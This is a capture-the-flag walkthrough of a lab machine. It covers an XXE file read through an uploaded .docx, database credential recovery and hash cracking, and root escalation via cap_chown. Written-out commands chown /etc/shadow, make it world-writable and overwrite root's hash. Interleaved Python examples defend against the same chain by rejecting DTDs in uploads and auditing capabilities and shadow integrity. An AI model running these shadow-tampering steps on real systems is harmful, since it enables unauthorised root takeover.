 
Nmap Output:
 
 
Home Page
 
 
While browsing the home page, we notice a subdomain in the URL that the Employment tab links to.
 
 
Edit /etc/hosts
 
 
job.empline.thm
 
 
Let's explore a bit:
 
 
Uploading a malicious document will let us read a file on the server.
 
Creation of the script to generate a ‘.docx’ file:
 
 
 
After running the script:
 
 
We edit it as above.
 
Now we just need to re-zip it all and upload it to the site!
 
 
After uploading:
 
 
We only got the username.
 
However, this does not let us move forward in exploiting the machine. What is more interesting is reading the contents of the config.php file, which holds the connection information for the database listening on port 3306.
 
The second line we will write this time is as follows.
 

"]>"

 
 
Let's decode it with base64.
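On the defensive side, the upload that made this file read possible can be refused before any XML parser touches it. Office Open XML parts never legitimately contain a DTD, so an upload handler can reject any .docx whose XML parts declare a DOCTYPE or ENTITY. The following is an added Python example, not code from the room or from the application's own code base; the .docx packages it checks are constructed in memory, and the part contents are minimal placeholders rather than real documents.

```python
import io
import re
import zipfile

# Markers that must never appear in an Office Open XML part: OOXML carries
# no DTD, so a DOCTYPE or ENTITY declaration is reason enough to reject.
DTD_MARKERS = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)

# Constructed minimal .docx parts (not a real document), enough for the
# upload handler to exercise its checks.
CLEAN_PARTS = {
    "[Content_Types].xml": '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
    "word/document.xml": '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>hello</w:t></w:r></w:p></w:body></w:document>',
}

# Same package, but document.xml declares an internal DTD entity. That is
# all the validator needs to see; it never resolves or expands anything.
DTD_PARTS = dict(CLEAN_PARTS)
DTD_PARTS["word/document.xml"] = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE w:document [<!ENTITY sample "text">]>'
    '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
    '<w:body><w:p><w:r><w:t>&sample;</w:t></w:r></w:p></w:body></w:document>'
)


def build_docx(parts):
    """Zip a dict of {part name: xml text} into .docx bytes, in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()


def find_dtd_parts(docx_bytes, max_part_size=5 * 1024 * 1024):
    """Names of XML parts that carry a DOCTYPE/ENTITY declaration.

    Parts whose declared uncompressed size exceeds max_part_size are also
    reported, so a decompression bomb is refused before it is read."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if not name.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > max_part_size:
                flagged.append(name)
                continue
            if DTD_MARKERS.search(zf.read(name)):
                flagged.append(name)
    return flagged


def is_safe_docx(docx_bytes):
    """True when the package is a valid zip and no XML part declares a DTD."""
    try:
        return not find_dtd_parts(docx_bytes)
    except zipfile.BadZipFile:
        return False


if __name__ == "__main__":
    print("clean package accepted:", is_safe_docx(build_docx(CLEAN_PARTS)))  # True
    print("DTD package accepted:  ", is_safe_docx(build_docx(DTD_PARTS)))    # False
```

The check is an allowlist rule rather than a signature: it does not look for SYSTEM identifiers, PHP wrappers or any particular payload, because a legitimate document has no business declaring a DTD at all. Whatever parser processes the accepted file should still be configured with external entity resolution disabled; this check is the cheap first gate, not a replacement for that.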
 
 
Log in with the database information.
 
 

mysql -h 10.10.170.127 -u james -p opencats

select * from user;

Let's go down a little bit:
 
 
md5crackstation
 
 
We can log in with the recovered password.
 
 
We got our first flag.
 
Time for privilege escalation...
 
 
cap_chown is set; this capability allows changing the owner of any file or directory.
 
 
Result:




Let me explain the commands:
  
Change the owner of /etc/shadow

george@empline# ruby -e "File.chown(1002, 1002, '/etc/shadow')"

Set 777 permissions on the file
 

george@empline# chmod 777 /etc/shadow

Generate a password hash for the root user, using ufkdup as the password
 

george@empline# openssl passwd ufkdup

We get ItrWeBp6tLgsA
 
Let's modify the root user in /etc/shadow
 

root:$6$1cvOcl49$/czKHKvBaz450J3YnIvkqexT.StvdgUWzPr5X1Aitt/kxgF/i78wziX3zJQ0y8Kg9y749Qjr5EFiHmTdPsIJH/:

to
 

root:ItrWeBp6tLgsA:

Switch to root.
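Two host checks a defender can run to surface this escalation path, and to notice it after the fact, as an added Python example that is not part of the writeup: a parser for `getcap -r /` output that flags binaries carrying capabilities able to bypass ownership or permission checks (cap_chown among them), and a check that /etc/shadow kept its owner, mode and hash format. The getcap sample and the non-root shadow lines are constructed; the ruby path in the sample is an assumption, and the two root hashes are the ones quoted above.

```python
import os
import re
import stat

# Capabilities that let a process bypass ownership or permission checks.
# A binary carrying any of these is a privilege-escalation path for
# whoever can execute it, exactly like cap_chown on the interpreter above.
DANGEROUS_CAPS = {
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_setfcap",
}

# Hash prefixes acceptable in /etc/shadow: sha512crypt, yescrypt,
# gost-yescrypt, scrypt, sha256crypt. Anything else is legacy (DES, MD5)
# or not a hash at all.
STRONG_HASH_PREFIXES = ("$6$", "$y$", "$gy$", "$7$", "$5$")

# Constructed sample of `getcap -r / 2>/dev/null`, mixing the older
# "path = caps+flags" layout with the newer "path caps=flags" layout.
# The ruby path is an assumption, not taken from the target.
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/local/bin/ruby = cap_chown+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
"""

# Constructed /etc/shadow excerpts. The root hashes are the ones quoted in
# the walkthrough; the remaining fields and accounts are made up.
SHADOW_BEFORE = """\
root:$6$1cvOcl49$/czKHKvBaz450J3YnIvkqexT.StvdgUWzPr5X1Aitt/kxgF/i78wziX3zJQ0y8Kg9y749Qjr5EFiHmTdPsIJH/:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
george:!:19000:0:99999:7:::
"""
SHADOW_AFTER = SHADOW_BEFORE.replace(
    "$6$1cvOcl49$/czKHKvBaz450J3YnIvkqexT.StvdgUWzPr5X1Aitt/kxgF/i78wziX3zJQ0y8Kg9y749Qjr5EFiHmTdPsIJH/",
    "ItrWeBp6tLgsA",
)


def parse_getcap(output):
    """Map each path in getcap output to the set of capability names it carries.
    Assumes paths without spaces, which is what getcap -r prints for system binaries."""
    result = {}
    for line in output.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        path, clauses = tokens[0], [t for t in tokens[1:] if t != "="]
        names = set()
        for clause in clauses:
            for cap in clause.split(","):
                # strip the +ep / =ep / -e flag suffix, keep the capability name
                name = re.split(r"[+=-]", cap, maxsplit=1)[0].strip()
                if name:
                    names.add(name)
        result[path] = names
    return result


def risky_capability_files(output):
    """Paths whose capability set intersects DANGEROUS_CAPS, with the offending names."""
    hits = {}
    for path, caps in parse_getcap(output).items():
        bad = caps & DANGEROUS_CAPS
        if bad:
            hits[path] = bad
    return hits


def weak_shadow_entries(shadow_text):
    """(user, reason) for accounts whose password field is empty or uses a
    legacy hash. Locked accounts ('*' or '!' prefixed) are skipped."""
    findings = []
    for line in shadow_text.splitlines():
        if not line.strip():
            continue
        user, pw = line.split(":", 2)[:2]
        if pw == "":
            findings.append((user, "empty password field"))
        elif pw.startswith(("!", "*")):
            continue
        elif not pw.startswith(STRONG_HASH_PREFIXES):
            findings.append((user, "legacy or unexpected hash format"))
    return findings


def shadow_metadata_issues(uid, mode):
    """Owner/mode problems for a shadow file: must be root-owned, never
    world-accessible, never group-writable."""
    issues = []
    if uid != 0:
        issues.append(f"owned by uid {uid}, expected root")
    if mode & 0o007:
        issues.append(f"mode {mode:04o} grants world access")
    if mode & 0o020:
        issues.append(f"mode {mode:04o} grants group write")
    return issues


def audit_shadow_file(path="/etc/shadow"):
    """Run the metadata check against a live file; stat needs no read access."""
    st = os.stat(path)
    return shadow_metadata_issues(st.st_uid, stat.S_IMODE(st.st_mode))
```

On the sample data the capability audit reports only the ruby binary (ping's cap_net_raw and the keyring daemon's cap_ipc_lock are not in the dangerous set), the shadow check is clean before the attack and flags root's 13-character DES hash afterwards, and a 0777 file owned by uid 1002 produces three findings. Running `audit_shadow_file()` from cron or a configuration-management check catches the chown and chmod steps of this chain even when the hash is later restored.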